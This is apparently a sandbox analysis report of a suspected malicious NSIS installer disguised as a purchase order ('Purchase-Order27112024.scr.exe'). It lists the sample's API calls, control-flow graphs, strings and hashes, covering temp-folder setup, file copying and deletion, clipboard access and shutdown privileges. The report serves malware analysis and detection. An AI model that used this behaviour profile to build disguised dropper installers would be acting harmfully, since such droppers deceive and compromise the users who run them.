5656->5659 5661 4043b6 5657->5661 5658->5655 5667 404578 5658->5667 5659->5658 5666 40451d 6 API calls 5659->5666 5660->5654 5660->5655 5663 4044a4 GetDlgItem SendMessageW 5660->5663 5664 40419a 19 API calls 5661->5664 5665 4045a0 5662->5665 5683 4041bc KiUserCallbackDispatcher 5663->5683 5670 4043c3 CheckDlgButton 5664->5670 5666->5658 5671 40458e 5667->5671 5672 40457e SendMessageW 5667->5672 5669 4044ce 5673 4045ca SendMessageW 5669->5673 5681 4041bc KiUserCallbackDispatcher 5670->5681 5671->5665 
5675 404594 SendMessageW 5671->5675 5672->5671 5673->5654 5675->5665 5676 4043e1 GetDlgItem 5682 4041cf SendMessageW 5676->5682 5678 4043f7 SendMessageW 5679 404414 GetSysColor 5678->5679 5680 40441d SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5678->5680 5679->5680 5680->5665 5681->5676 5682->5678 5683->5669 5684 4014b8 5685 4014be 5684->5685 5686 401389 2 API calls 5685->5686 5687 4014c6 5686->5687 4686 4015b9 4687 402b3a 18 API calls 4686->4687 4688 4015c0 4687->4688 4689 405a3e 4 API calls 4688->4689 4696 4015c9 4689->4696 4690 401614 4692 401619 4690->4692 4693 401646 4690->4693 4691 4059c0 CharNextW 4694 4015d7 CreateDirectoryW 4691->4694 4695 401423 25 API calls 4692->4695 4698 401423 25 API calls 4693->4698 4694->4696 4697 4015ed GetLastError 4694->4697 4699 401620 4695->4699 4696->4690 4696->4691 4697->4696 4700 4015fa GetFileAttributesW 4697->4700 4703 40163e 4698->4703 4704 405f48 lstrcpynW 4699->4704 4700->4696 4702 40162d SetCurrentDirectoryW 4702->4703 4704->4702 5688 401939 5689 402b3a 18 API calls 5688->5689 5690 401940 lstrlenW 5689->5690 5691 4024e8 5690->5691 5692 40293b 5693 402b1d 18 API calls 5692->5693 5694 402941 5693->5694 5695 402974 5694->5695 5696 402793 5694->5696 5698 40294f 5694->5698 5695->5696 5697 405f6a 18 API calls 5695->5697 5697->5696 5698->5696 5700 405e8f wsprintfW 5698->5700 5700->5696 4916 40173f 4917 402b3a 18 API calls 4916->4917 4918 401746 4917->4918 4919 405be3 2 API calls 4918->4919 4920 40174d 4919->4920 4921 405be3 2 API calls 4920->4921 4921->4920 5708 10002a7f 5709 10002a97 5708->5709 5710 1000158f 2 API calls 5709->5710 5711 10002ab2 5710->5711

Control-flow Graph: entry block 40335a-4033f2 (#17, SetErrorMode, OleInitialize, call 4062b2, SHGetFileInfoW, call 405f48, GetCommandLineW, call 405f48, GetModuleHandleW); graph edge data omitted.
APIs
• #17.COMCTL32 ref: 00403379
• SetErrorMode.KERNELBASE(00008001), ref: 00403384
• OleInitialize.OLE32(00000000), ref: 0040338B
  • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
  • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
  • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
• SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
  • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
• GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
• GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe",00000000), ref: 004033DB
• CharNextW.USER32(00000000,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe",00000020), ref: 00403403
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040353B
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040354C
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403558
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040356C
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403574
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403585
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040358D
• DeleteFileW.KERNELBASE(1033), ref: 004035A1
• OleUninitialize.OLE32(?), ref: 0040366C
• ExitProcess.KERNEL32 ref: 0040368C
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe",00000000,?), ref: 00403698
• lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe",00000000,?), ref: 004036A4
• CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004036B0
• SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004036B7
• DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
• CopyFileW.KERNEL32(C:\Users\user\Desktop\Purchase-Order27112024.scr.exe,0041FEA8,00000001), ref: 00403725
• CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
• GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 004037AC
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
• ExitProcess.KERNEL32 ref: 00403827
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                      • String ID: "C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\googly\pulsation$C:\Users\user\AppData\Local\googly\pulsation$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase-Order27112024.scr.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                      • API String ID: 4107622049-1372983555
                                                                                                      • Opcode ID: 4d4429256b2e22e1563bae374a615e4d58d6fbe71fb0bbfbec444303671cea11
                                                                                                      • Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
                                                                                                      • Opcode Fuzzy Hash: 4d4429256b2e22e1563bae374a615e4d58d6fbe71fb0bbfbec444303671cea11
                                                                                                      • Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 123 405331-40534c 124 405352-40541b GetDlgItem * 3 call 4041cf call 404a8f GetClientRect GetSystemMetrics SendMessageW * 2 123->124 125 4054dd-4054e4 123->125 146 405439-40543c 124->146 147 40541d-405437 SendMessageW * 2 124->147 127 4054e6-405508 GetDlgItem CreateThread CloseHandle 125->127 128 40550e-40551b 125->128 127->128 130 405539-405543 128->130 131 40551d-405523 128->131 135 405545-40554b 130->135 136 405599-40559d 130->136 133 405525-405534 ShowWindow * 2 call 4041cf 131->133 134 40555e-405567 call 404201 131->134 133->130 143 40556c-405570 134->143 140 405573-405583 ShowWindow 135->140 141 40554d-405559 call 404173 135->141 136->134 138 40559f-4055a5 136->138 138->134 148 4055a7-4055ba SendMessageW 138->148 144 405593-405594 call 404173 140->144 145 405585-40558e call 4051f2 140->145 141->134 144->136 145->144 152 40544c-405463 call 40419a 146->152 153 40543e-40544a SendMessageW 146->153 147->146 154 4055c0-4055eb CreatePopupMenu call 405f6a AppendMenuW 148->154 155 4056bc-4056be 148->155 162 405465-405479 ShowWindow 152->162 163 405499-4054ba GetDlgItem SendMessageW 152->163 153->152 160 405600-405615 TrackPopupMenu 154->160 161 4055ed-4055fd GetWindowRect 154->161 155->143 160->155 165 40561b-405632 160->165 161->160 166 405488 162->166 167 40547b-405486 ShowWindow 162->167 163->155 164 4054c0-4054d8 SendMessageW * 2 163->164 164->155 169 405637-405652 SendMessageW 165->169 168 40548e-405494 call 4041cf 166->168 167->168 168->163 169->169 170 405654-405677 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 169->170 172 405679-4056a0 SendMessageW 170->172 172->172 173 4056a2-4056b6 GlobalUnlock SetClipboardData CloseClipboard 172->173 173->155
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 00405390
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040539F
                                                                                                      • GetClientRect.USER32(?,?), ref: 004053DC
                                                                                                      • GetSystemMetrics.USER32(00000015), ref: 004053E4
                                                                                                      • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405480
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004054A1
                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 004053AE
                                                                                                        • Part of subcall function 004041CF: SendMessageW.USER32(00000028,?,00000001,00403FFB), ref: 004041DD
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004054F3
                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_000052C5,00000000), ref: 00405501
                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00405508
                                                                                                      • ShowWindow.USER32(00000000), ref: 0040552C
                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405531
                                                                                                      • ShowWindow.USER32(00000008), ref: 0040557B
                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
                                                                                                      • CreatePopupMenu.USER32 ref: 004055C0
                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
                                                                                                      • GetWindowRect.USER32(?,?), ref: 004055F4
                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040560D
                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405655
                                                                                                      • EmptyClipboard.USER32 ref: 0040565B
                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405671
                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004056A5
                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
                                                                                                      • CloseClipboard.USER32 ref: 004056B6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                      • String ID: {$&B
                                                                                                      • API String ID: 590372296-2518801558
                                                                                                      • Opcode ID: 7775d457d8fde2865fa6d0874cf326612850ae095f4a8d1cd8ac1be61ac30762
                                                                                                      • Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
                                                                                                      • Opcode Fuzzy Hash: 7775d457d8fde2865fa6d0874cf326612850ae095f4a8d1cd8ac1be61ac30762
                                                                                                      • Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 419 405f6a-405f75 420 405f77-405f86 419->420 421 405f88-405f9e 419->421 420->421 422 405fa4-405fb1 421->422 423 4061b6-4061bc 421->423 422->423 424 405fb7-405fbe 422->424 425 4061c2-4061cd 423->425 426 405fc3-405fd0 423->426 424->423 428 4061d8-4061d9 425->428 429 4061cf-4061d3 call 405f48 425->429 426->425 427 405fd6-405fe2 426->427 430 4061a3 427->430 431 405fe8-406024 427->431 429->428 433 4061b1-4061b4 430->433 434 4061a5-4061af 430->434 435 406144-406148 431->435 436 40602a-406035 GetVersion 431->436 433->423 434->423 439 40614a-40614e 435->439 440 40617d-406181 435->440 437 406037-40603b 436->437 438 40604f 436->438 437->438 443 40603d-406041 437->443 446 406056-40605d 438->446 444 406150-40615c call 405e8f 439->444 445 40615e-40616b call 405f48 439->445 441 406190-4061a1 lstrlenW 440->441 442 406183-40618b call 405f6a 440->442 441->423 442->441 443->438 448 406043-406047 443->448 457 406170-406179 444->457 445->457 450 406062-406064 446->450 451 40605f-406061 446->451 448->438 453 406049-40604d 448->453 455 4060a0-4060a3 450->455 456 406066-40608c call 405e15 450->456 451->450 453->446 458 4060b3-4060b6 455->458 459 4060a5-4060b1 GetSystemDirectoryW 455->459 468 406092-40609b call 405f6a 456->468 469 40612b-40612f 456->469 457->441 461 40617b 457->461 463 406121-406123 458->463 464 4060b8-4060c6 GetWindowsDirectoryW 458->464 462 406125-406129 459->462 466 40613c-406142 call 4061dc 461->466 462->466 462->469 463->462 467 4060c8-4060d2 463->467 464->463 466->441 474 4060d4-4060d7 467->474 475 4060ec-406102 SHGetSpecialFolderLocation 467->475 468->462 469->466 472 406131-406137 lstrcatW 469->472 472->466 474->475 477 4060d9-4060e0 474->477 478 406104-40611b SHGetPathFromIDListW CoTaskMemFree 475->478 479 40611d 475->479 480 4060e8-4060ea 477->480 478->462 478->479 479->463 480->462 480->475
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,?,00405229,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000), ref: 0040602D
                                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004060AB
                                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004060BE
                                                                                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
                                                                                                      • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406108
                                                                                                      • CoTaskMemFree.OLE32(?), ref: 00406113
                                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
                                                                                                      • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,?,00405229,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000), ref: 00406191
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                      • API String ID: 900638850-764496434
                                                                                                      • Opcode ID: 1bceb9c34b05b27e3618ed90a195e6464c3aae8e072edacfa9e3722d3d9acc23
                                                                                                      • Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
                                                                                                      • Opcode Fuzzy Hash: 1bceb9c34b05b27e3618ed90a195e6464c3aae8e072edacfa9e3722d3d9acc23
                                                                                                      • Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 481 4057d0-4057f6 call 405a9b 484 4057f8-40580a DeleteFileW 481->484 485 40580f-405816 481->485 488 40598c-405990 484->488 486 405818-40581a 485->486 487 405829-405839 call 405f48 485->487 489 405820-405823 486->489 490 40593a-40593f 486->490 494 405848-405849 call 4059df 487->494 495 40583b-405846 lstrcatW 487->495 489->487 489->490 490->488 493 405941-405944 490->493 496 405946-40594c 493->496 497 40594e-405956 call 40628b 493->497 498 40584e-405852 494->498 495->498 496->488 497->488 505 405958-40596c call 405993 call 405788 497->505 501 405854-40585c 498->501 502 40585e-405864 lstrcatW 498->502 501->502 504 405869-405885 lstrlenW FindFirstFileW 501->504 502->504 506 40588b-405893 504->506 507 40592f-405933 504->507 521 405984-405987 call 4051f2 505->521 522 40596e-405971 505->522 510 4058b3-4058c7 call 405f48 506->510 511 405895-40589d 506->511 507->490 509 405935 507->509 509->490 523 4058c9-4058d1 510->523 524 4058de-4058e9 call 405788 510->524 515 405912-405922 FindNextFileW 511->515 516 40589f-4058a7 511->516 515->506 519 405928-405929 FindClose 515->519 516->510 520 4058a9-4058b1 516->520 519->507 520->510 520->515 521->488 522->496 525 405973-405982 call 4051f2 call 405de2 522->525 523->515 526 4058d3-4058dc call 4057d0 523->526 534 40590a-40590d call 4051f2 524->534 535 4058eb-4058ee 524->535 525->488 526->515 534->515 538 4058f0-405900 call 4051f2 call 405de2 535->538 539 405902-405908 535->539 538->515 539->515
                                                                                                      APIs
                                                                                                      • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"), ref: 004057F9
                                                                                                      • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"), ref: 00405841
                                                                                                      • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"), ref: 00405864
                                                                                                      • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"), ref: 0040586A
                                                                                                      • FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"), ref: 0040587A
                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
                                                                                                      • FindClose.KERNEL32(00000000), ref: 00405929
                                                                                                      Strings
                                                                                                      • "C:\Users\user\Desktop\Purchase-Order27112024.scr.exe", xrefs: 004057D9
                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004057DE
                                                                                                      • \*.*, xrefs: 0040583B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                      • String ID: "C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                      • API String ID: 2035342205-1807519440
                                                                                                      • Opcode ID: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
                                                                                                      • Instruction ID: 2292a97837c012d07e09995a86319137dd3f2048718c0aa8a22e23afcdeedbd0
                                                                                                      • Opcode Fuzzy Hash: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
                                                                                                      • Instruction Fuzzy Hash: BF41C171800914EACF217B668C49BBF7678EB81328F24817BF811761D1D77C4E829E6E
Memory Dump Source
• Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
• Instruction ID: 2d3234ddcc30eb1b928d1b3f6e05ca322d860fc2e9c12c5c13e3e91ce8371178
• Opcode Fuzzy Hash: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
• Instruction Fuzzy Hash: 74F17571D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D3785A96CF44
APIs
• FindFirstFileW.KERNELBASE(?,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,?,?,76232EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,76232EE0), ref: 00406296
• FindClose.KERNEL32(00000000), ref: 004062A2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID: 8WB
• API String ID: 2295610775-3088156181
• Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
• Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
• Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
• Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D
APIs
• GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
• LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
• GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
Memory Dump Source
• Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
